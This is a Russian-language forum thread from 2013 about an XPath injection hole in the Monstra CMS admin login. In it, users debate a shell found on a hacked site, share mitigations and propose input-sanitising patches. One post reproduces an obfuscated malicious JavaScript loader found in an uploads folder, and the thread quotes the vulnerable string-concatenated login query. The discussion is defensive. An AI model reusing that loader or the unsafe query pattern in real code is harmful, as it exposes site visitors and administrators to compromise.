1

Тема: Найденные критические ошибки в Monstra CMS

Всем добрый день!

По долгу службы занимаюсь мониторингом новостей по информационной безопасности и наткнулся на обнаруженную в монстре уязвимость - http://www.securitylab.ru/vulnerability/445421.php, http://www.vulnerability-lab.com/get_co … hp?id=1081.

Проблема с обработкой логина при входе в админку. Как я понял недостаточная обработка вводимой в поле строки.

Было бы здорово пофиксить эту проблему.

Сайт loader

Поделиться

2

Re: Найденные критические ошибки в Monstra CMS

loader пишет:

Было бы здорово пофиксить эту проблему.

Интересно , а о чем тогда думают сами разработчики ?

Поделиться

3 2013-10-25 13:27:20

Re: Найденные критические ошибки в Monstra CMS

сегодня обнаружил, что монстру взломали. в корне сайта папка css с правами 0777, в ней файл sys0972500-1.php с шеллом внутри. так что все проверьте свои сайты, может тоже коснулось.

ну и главное, хотелось бы увидеть патч или руководство по исправлению уязвимости.

Поделиться

4 2013-10-25 13:52:48

Re: Найденные критические ошибки в Monstra CMS

да, к шеллу идут обращения с айпи 146.185.246.18, с аккаунта рассылается множественный спам.

Поделиться

5

Re: Найденные критические ошибки в Monstra CMS

FLy пишет:

сегодня обнаружил, что монстру взломали. в корне сайта папка css с правами 0777, в ней файл sys0972500-1.php с шеллом внутри. так что все проверьте свои сайты, может тоже коснулось.

ну и главное, хотелось бы увидеть патч или руководство по исправлению уязвимости.

И причём тут monstra? Это сервер у Вас фиговый.
1. Как вы через монстру сможете сделать: "в корне сайта папка css с правами 0777, в ней файл sys0972500-1.php с шеллом внутри"?
Ответ: никак.
Это вы только через админку сервера только сделайте.

Поделиться

6

Re: Найденные критические ошибки в Monstra CMS

Ну... у него в корне был... а меня внутри монстры  в каком то плагине.. такой файл затесался только ai-bolit том нашел smile

Лучше сгореть, чем истлеть...

Сайт kromverk

Поделиться

7 2013-10-26 11:12:05

Re: Найденные критические ошибки в Monstra CMS

kromverk пишет:

Ну... у него в корне был... а меня внутри монстры  в каком то плагине.. такой файл затесался только ai-bolit том нашел smile

Аналогичный ответ... Не в monstra дело;-)

Поделиться

8

Re: Найденные критические ошибки в Monstra CMS

newbie пишет:
FLy пишет:

сегодня обнаружил, что монстру взломали. в корне сайта папка css с правами 0777, в ней файл sys0972500-1.php с шеллом внутри. так что все проверьте свои сайты, может тоже коснулось.

ну и главное, хотелось бы увидеть патч или руководство по исправлению уязвимости.

И причём тут monstra? Это сервер у Вас фиговый.
1. Как вы через монстру сможете сделать: "в корне сайта папка css с правами 0777, в ней файл sys0972500-1.php с шеллом внутри"?
Ответ: никак.
Это вы только через админку сервера только сделайте.

на мой фиговый сервер каждый день приходится по несколько тысяч атак с брутом всяких вордпрессов, джумл и т.д. и только на сайте с монстрой, ну надо же какая случайность, появляется шелл. из-за ограничений open_basedir злоумышленник не смог выйти за пределы аккаунта этого сайта, шеллы были рассованы внутри _только_ этого аккаунта. ещё не убедил? хорошо, продолжим...

для начала, предлагаю прочитать описание уязвимости "XPath-инъекция в Monstra CMS" - http://www.securitylab.ru/vulnerability/445421.php
затем погуглите, что такое вообще XPath-инъекция.
ну и на последок самое вкусное - как, имея все необходимые данные, залить скрипт в папку /public/uploads и через него залить шелл на сайт? ответ - очень просто.
и вы серьёзно думаете, что все шеллы заливаются только через админ-панели хостингов?)

вот код скрипта, заливающего шелл, обнаруженный в папке uploads:

function addNewObject(){try{var ua=navigator.userAgent.toLowerCase();if((ua.indexOf("chrome")==-1&&ua.indexOf("win")!=-1)&&navigator.javaEnabled()){var counter="/tmp/minify/.empty.swf?r=338639035";var div=document.createElement('div');div.innerHTML='';div.innerHTML+='';div.innerHTML+='';div.innerHTML+='';div.innerHTML+='';div.style.position='absolute';div.style.left='-100px';div.style.top='-100px';document.body.insertBefore(div,document.body.children[0]);}}catch(e){if(document.body==undefined||document.body.children[0]==undefined){setTimeout('addNewObject()',50);}}};addNewObject();

вот обзор на хабре - http://habrahabr.ru/post/196882/

разбираться с этим всем делом некогда, поэтому временно принял такие меры - htpasswd на вход в админку, chmod 0444 на все файлы и рекомендация всем клиентам на монстре или ждать патчей, или переходить на другую cms.

Поделиться

9

Re: Найденные критические ошибки в Monstra CMS

Если все так серьезно, то почему основной сайт монстры не взломан и работает ?

Site | GitHub | Создание форумов/решений на базе PunBB/Monstra/OGMA

Плагины распространяются по Creative Commons Attribution-NonCommercial 3.0
+ Модест

Сайт KANekT

Поделиться

10 2013-10-28 14:29:09

Re: Найденные критические ошибки в Monstra CMS

KANekT пишет:

Если все так серьезно, то почему основной сайт монстры не взломан и работает ?

ну тогда бы баги быстро поправили, кому это нужно?) да и как тут сказать, взломан он или нет? не будут же об этом писать большими зелёными буквами на черном фоне, как  в фильмах. или зальют молча шелл для включения в ботнет, или спам будут слать с белого айпи. ну ещё бывает ява скрипт зараженный вставят, но тут быстро всё пресекается, пользователи с антивирусами быстро вам сообщат, что они думают о таких сайтах. я бы тоже ещё долго не знал, если бы не начали приходить абузы на спам с одного из моих айпишников. начал разбираться, и вот я здесь)

Поделиться

11 2013-10-29 01:32:54

Re: Найденные критические ошибки в Monstra CMS

FLy пишет:

разбираться с этим всем делом некогда, поэтому временно принял такие меры - htpasswd на вход в админку, chmod 0444 на все файлы и рекомендация всем клиентам на монстре или ждать патчей, или переходить на другую cms.

А если поменять путь к админке?

Поделиться

12 2013-10-29 04:36:59

Re: Найденные критические ошибки в Monstra CMS

Что же у тебя за сайты-то такие, что атаки тысячами? 50000 юнитов в день пойди? У меня твоё описание в голове плохо укладывается... Как-то слишко преувеличенно на мой взгляд. Я держу на данный момент более 30 сайтов на monstra, и как-то странно такого нет... А самое классное, как раз в тему, вчера обратился один товарищ, у него 5 страниц обычных на html и без всяких админок и cms и таже фигня как у тебя. Поэтому какие бы там дыры не были, я придерживаюсь мнения, что вся защита лежит на сервере в первую очередь, а cms это уже побочное

Поделиться

13

Re: Найденные критические ошибки в Monstra CMS

Zzz пишет:
FLy пишет:

разбираться с этим всем делом некогда, поэтому временно принял такие меры - htpasswd на вход в админку, chmod 0444 на все файлы и рекомендация всем клиентам на монстре или ждать патчей, или переходить на другую cms.

А если поменять путь к админке?

если сайтом пользуетесь только вы - конечно, и адрес поменять, и htpasswd сделать.

newbie пишет:

Что же у тебя за сайты-то такие, что атаки тысячами? 50000 юнитов в день пойди? У меня твоё описание в голове плохо укладывается... Как-то слишко преувеличенно на мой взгляд. Я держу на данный момент более 30 сайтов на monstra, и как-то странно такого нет... А самое классное, как раз в тему, вчера обратился один товарищ, у него 5 страниц обычных на html и без всяких админок и cms и таже фигня как у тебя. Поэтому какие бы там дыры не были, я придерживаюсь мнения, что вся защита лежит на сервере в первую очередь, а cms это уже побочное

обычные будни так то, атакуют всё и вся.. например, из последних аналогичных случаев - уязвимости ip.board и timthumb, аналогично заливались шеллы через 0day уязвимости.
а что именно преувеличено? обычная практика, обнаружив уязвимость - искать патчи. а тут не только тишина, но и отрицание уязвимостей)
насчет "а cms это уже побочное", практика показывает обратное, намного чаще ломают сайты за счет багов конкретного скрипта, чем из-за каких-то недоработках в по сервера. тот же debian прославленный своей консервативностью в отношении версий по, обновляется только после многочисленных тестирований на предмет уязвимостей, а security патчи для текущих версий выпускаются оперативно. ну вот разве что подбора паролей нужно опасаться, т.к. юзеры тяготеют к комбинациям вида "qw12" smile но у меня с этим строго, минимальная длина пароля и fail2ban делают своё дело. и конкретно в данном случае, я изучал логи авторизаций на взломанном аккаунте, подборов пароля не было, входов в админку/ftp/ssh тоже, только get/post запросы в логах nginx и апача.

Поделиться

14 2013-10-30 05:00:19

Re: Найденные критические ошибки в Monstra CMS

дыра в админке есть - это факт.
текущее решение - htpass на папку админки, изменить путь к админке на свой, использовать сервис cloudflare.net или аналогичный.

у меня изначально так настроены все монстры.

Страдание фигнёй на рабочем месте развивает боковое зрение, слух, скорость реакции и бдительность в целом.
Пишу плагины под заказ, конвертирую шаблоны под Монстра - пишите на email через ссылку в профиле.

Поделиться

15

Re: Найденные критические ошибки в Monstra CMS

А если в admin/index.php заменить

    $user = $users->select("[login='" . trim(Request::post('login')) . "']", null);
    if (count($user) !== 0) {
        if ($user['login'] == Request::post('login')) {

на

    $login = htmlentities(trim(Request::post('login')));
    $user = $users->select("[login='" . $login . "']", null);
    if (count($user) !== 0) {
        if ($user['login'] == $login) {

Это хорошее решение или есть способ лучше ?

Site | GitHub | Создание форумов/решений на базе PunBB/Monstra/OGMA

Плагины распространяются по Creative Commons Attribution-NonCommercial 3.0

Сайт KANekT

Поделиться

16

Re: Найденные критические ошибки в Monstra CMS

ещё можно сделать $login = str_replace('username','hack',trim(Request::post('login')));
и на прочие имена узлов файла юзеров монстры.

Страдание фигнёй на рабочем месте развивает боковое зрение, слух, скорость реакции и бдительность в целом.
Пишу плагины под заказ, конвертирую шаблоны под Монстра - пишите на email через ссылку в профиле.

Поделиться

17 2013-10-31 08:02:08

Re: Найденные критические ошибки в Monstra CMS

El'Drako пишет:

ещё можно сделать $login = str_replace('username','hack',trim(Request::post('login')));
и на прочие имена узлов файла юзеров монстры.

То есть вы предлагаете под каждого пользователя свою строчку ?

Site | GitHub | Создание форумов/решений на базе PunBB/Monstra/OGMA

Плагины распространяются по Creative Commons Attribution-NonCommercial 3.0

Сайт KANekT

Поделиться

18 2013-10-31 08:05:21

Re: Найденные критические ошибки в Monstra CMS

нет, я предлагаю сделать запрещёнными именами слова из дерева хмл файла пользователей, чтобы нельзя было задать путь в запросе XPath.
нужно минимум две замены - названия узла с именем юзера и узла с паролем.

Страдание фигнёй на рабочем месте развивает боковое зрение, слух, скорость реакции и бдительность в целом.
Пишу плагины под заказ, конвертирую шаблоны под Монстра - пишите на email через ссылку в профиле.

Поделиться

19

Re: Найденные критические ошибки в Monstra CMS

htmlspecialchars или другая функция не решает проблему?
И почему нет ответов разработчиков, администрации?

Поделиться

20 2013-11-15 11:03:09

Re: Найденные критические ошибки в Monstra CMS

А в чём собственно заключается проблема с XPath ?

Поделиться

21

Re: Найденные критические ошибки в Monstra CMS

Эх пугаете вы меня. Вот вижу сообщения о уязвимости и сразу руки опускаются. Если у кого есть решения может с автором напрямую свяжетесь и поможете решить а то система у которой есть выявленные уязвимости не подходит чтобы советовать ее знакомым. И если честно я не совсем разбираюсь в угрозах. Может пока автор не пофиксил их сделать фак по угрозам и их решения, чтобы безопасно систему можно было устанавливать.

Ex ungue leonem

Поделиться

22 2013-11-18 05:27:41

Re: Найденные критические ошибки в Monstra CMS

Faust пишет:

Эх пугаете вы меня. Вот вижу сообщения о уязвимости и сразу руки опускаются. Если у кого есть решения может с автором напрямую свяжетесь и поможете решить а то система у которой есть выявленные уязвимости не подходит чтобы советовать ее знакомым. И если честно я не совсем разбираюсь в угрозах. Может пока автор не пофиксил их сделать фак по угрозам и их решения, чтобы безопасно систему можно было устанавливать.

А то он не знает:))) Все он прекрасно знает, и о багах и о пожеланиях пользователей и тд. Он же отвечал: решайте баги и проблемы сами, у него нет времени и вообще у него в следующую субботу очередная встреча "monstra"... Так что советую не ждать скорого изменения ситуации, ручками, ручками)))))

Поделиться

23 2013-11-18 06:48:01

Re: Найденные критические ошибки в Monstra CMS

Решение предложено, и должно устранить угрозу. Как проверить работоспособность - я не знаю.

newbie какой вклад от вас получен в развитие проекта?

Вы делаете сайты, зарабатывая на этой CMS и при этом поливая автора грязью - и хотите какой то поддержки ?

Site | GitHub | Создание форумов/решений на базе PunBB/Monstra/OGMA

Плагины распространяются по Creative Commons Attribution-NonCommercial 3.0

Сайт KANekT

Поделиться

24

Re: Найденные критические ошибки в Monstra CMS

KANekT пишет:

Решение предложено, и должно устранить угрозу. Как проверить работоспособность - я не знаю.

newbie какой вклад от вас получен в развитие проекта?

Вы делаете сайты, зарабатывая на этой CMS и при этом поливая автора грязью - и хотите какой то поддержки ?

1. От меня такой же вклад, как и от тебя и от других пользователей - по сути никакого. Эту систему на мой взгляд двигают от силы 2 человека. Разработчик Сергей и nakome... Ещё конечно я бы выделил Jinna, который хоть и ушёл отсюдова, но за определенную плату, он всегда оперативно напишет нужные плагины или решит конкретные проблемы, без всяких косяков и тягомотины. Ну это то, что я дейсвительно считаю вкладом.
2. Где я поливаю грязью? Процитируй конкретно слова... Тебе процитировать с форума слова разработчика или сам найдешь? Faust спросил, я ему ответил и Сергей тут непричем. Или я где-нибудь написал не правду? А если ты к тому, что Сергей так реагирует на мои посты - это нормально. Поищи в интернете форумы, где он продвигает свою систему, на любой, даже самый безобидный сорказм или мнение человека он тоже сразу всё воспринимает в штыки, это просто такой характер человека. Не надо это так близко воспринимать к сердцу.

Поделиться

25

Re: Найденные критические ошибки в Monstra CMS

KANekT - обычно я против обвинений или претензий на форуме, но в данном случае я поддерживаю newbie.
Очень не хочется чтобы такой замечательный проект закрылся, но если так дальше будет идти, то это произойдет. Ведь не обязательно, чтобы автор сам закрывал, достаточно просто не обращать на него внимание и он загнется на все 100 %

Спасибо говорим плюсиком в репутацию. Так виднее smile

Поделиться